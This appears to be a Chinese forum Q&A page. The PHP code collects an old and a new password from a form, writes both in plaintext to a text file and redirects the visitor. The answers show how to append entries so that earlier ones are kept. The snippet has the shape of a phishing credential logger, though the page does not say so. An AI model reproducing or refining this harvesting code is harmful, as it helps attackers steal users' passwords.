时间:2021-07-01 10:21:17 帮助过:3人阅读
if(isset($_POST['OldPasswd']) && isset($_POST['Passwd'])) { $OldPasswd = strip_tags($_POST['OldPasswd']); $password = strip_tags($_POST['Passwd']); $content = 'OldPasswd: ' . $OldPasswd . '
Password: '. $password . '
Powerd by 谢谢'; file_put_contents("out.txt",$content);//用什么函数能让之后变量的内容不覆盖之前的内容??? header('Location: redirect.php'); }?>
file_put_contents("out.txt",$content, FILE_APPEND);//用什么函数能让之后变量的内容不覆盖之前的内容???
file_put_contents("out.txt",$content,FILE_APPEND);
PHP的函数库就是有优势。
c++的话只有框架才到这个程度。java不太清楚,应该也不错。